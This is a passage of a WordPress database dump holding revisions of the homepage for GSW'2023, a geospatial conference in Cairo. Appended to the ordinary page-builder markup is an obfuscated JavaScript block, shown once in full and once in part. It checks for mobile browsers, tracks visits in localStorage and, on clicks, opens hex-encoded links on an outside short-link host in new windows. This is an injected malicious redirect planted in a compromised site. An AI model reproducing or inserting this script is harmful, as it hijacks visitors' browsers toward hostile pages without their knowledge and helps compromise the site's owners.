ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home_n','','inherit','closed','closed','','3066-revision-v1','','','2022-11-09 15:16:17','2022-11-09 15:16:17','',3066,'https://gsw2023.com/?p=3135',0,'revision','',0),
(3136,1,'2022-11-09 15:16:48','2022-11-09 15:16:48','[vc_row][vc_column width=\"1/2\"][vc_column_text]\r\n<h3></h3>\r\n<h3>EGYPT GSW\'2023</h3>\r\n<h3>The First Geospatial Week in Africa and The Middle East</h3>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005291201{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"right\"][/vc_column_inner][vc_column_inner width=\"3/4\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#3724e5\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1667948825977{margin-top: 25px !important;}\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text]\r\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\r\n[/vc_column_text][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3082\" img_size=\"799x452\"][/vc_column][/vc_row][vc_row][vc_column awb_type=\"image\" awb_stretch=\"1\" awb_image_background_position=\"0% 50%\" awb_parallax=\"scroll\" awb_parallax_speed=\"0.5\" awb_image=\"2275\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"5\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^1900|url^https://gsw2023.com/wp-content/uploads/2018/06/trade10.jpg|caption^null|alt^null|title^trade10|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1529568771974{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION FEES\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]Opening of registration platform: soon[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][vc_column][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1665815238858{padding-top: 40px !important;padding-bottom: 40px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#ffffff\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"white\" style=\"shadow\" border_width=\"10\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#311b92\" tick_col=\"#ffffff\" tick_sep_col=\"#eeee22\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#eeee22\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home_n','','inherit','closed','closed','','3066-revision-v1','','','2022-11-09 15:16:48','2022-11-09 15:16:48','',3066,'https://gsw2023.com/?p=3136',0,'revision','',0),
(3137,1,'2022-11-09 15:20:44','2022-11-09 15:20:44','[vc_row][vc_column width=\"1/2\"][vc_column_text]\r\n<h3></h3>\r\n<h3>EGYPT GSW\'2023</h3>\r\n<h3>The First Geospatial Week in Africa and The Middle East</h3>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005291201{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"right\"][/vc_column_inner][vc_column_inner width=\"3/4\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#3724e5\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1667948825977{margin-top: 25px !important;}\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text]\r\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\r\n[/vc_column_text][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3082\" img_size=\"799x452\"][/vc_column][/vc_row][vc_row][vc_column awb_type=\"image\" awb_stretch=\"1\" awb_image_background_position=\"0% 50%\" awb_parallax=\"scroll\" awb_parallax_speed=\"0.5\" awb_image=\"2275\"][vc_row_inner][vc_column_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"5\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^1900|url^https://gsw2023.com/wp-content/uploads/2018/06/trade10.jpg|caption^null|alt^null|title^trade10|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1529568771974{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" 